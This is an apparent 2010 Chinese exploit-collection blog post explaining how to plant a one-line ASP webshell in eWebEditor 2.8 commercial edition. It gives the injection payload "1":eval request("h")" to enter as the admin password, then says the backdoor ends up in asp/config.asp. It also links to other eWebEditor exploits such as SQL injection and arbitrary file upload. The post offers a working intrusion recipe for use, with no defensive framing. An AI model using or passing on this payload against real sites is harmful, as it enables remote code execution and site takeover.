eWebEditor 2.8 商业版插一句话木马

2010, June 8, 8:34 PM. oday收藏
Submitted by admin
影响版本:=>2.8 商业版
攻击利用:
登陆后台,点击修改密码---新密码设置为  1":eval request("h")’

设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.

« 上一篇 | 下一篇 »

只显示10条记录相关文章
ewebeditor无后台另类拿站 (浏览: 39739, 评论: 1)
SQL注入eWebEditor数据库 (浏览: 9211, 评论: 0)
ewebeditor for php任意文件上传漏洞 (浏览: 12180, 评论: 0)
eWebEditor suffers from a directory traversal vulnerability (浏览: 7932, 评论: 0)
ewebeditor 5.2 列目录漏洞 (浏览: 9916, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):